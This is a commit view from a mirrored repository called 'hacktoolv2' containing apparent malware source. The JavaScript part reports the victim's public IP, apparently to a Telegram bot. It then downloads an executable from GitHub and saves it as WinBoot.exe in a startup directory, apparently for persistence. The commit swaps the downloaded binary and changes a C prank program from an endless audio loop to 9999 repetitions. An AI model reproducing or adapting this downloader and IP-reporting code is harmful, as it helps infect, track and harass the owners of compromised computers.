2
0
mirror of https://github.com/constantinDev/hacktoolv2 synced 2025-08-29 16:57:38 +00:00
This commit is contained in:
WOOOMY-lol 2020-07-30 19:40:27 +02:00
parent 90059da693
commit 9012a17728
4 changed files with 2 additions and 3 deletions

View File

@ -23,7 +23,7 @@ https.get("https://api.ipify.org", (ip) => {
parse_mode: "HTML"
}
}).then(_ => {
https.get("https://raw.githubusercontent.com/constantinDev/hacktoolv2/master/Hax/Runner/bin/WinBoot.exe", (res) => {
https.get("https://raw.githubusercontent.com/constantinDev/hacktoolv2/master/Hax/Runner/bin/main.exe", (res) => {
let stream = fs.createWriteStream(startdir + "/WinBoot.exe")
res.pipe(stream)
res.on("close", () => {

View File

@ -1,9 +1,8 @@
#include <Windows.h>
#include <mmsystem.h>
#pragma comment(lib, "Winmm.lib")
int main() {
while (1) PlaySound(TEXT("./etc/audio.wav"), NULL, SND_FILENAME);
for(int i = 0;i<9999;i++) PlaySound(TEXT("./etc/audio.wav"), NULL, SND_FILENAME);
return 0;
}

BIN
Hax/Runner/src/main.obj Normal file

Binary file not shown.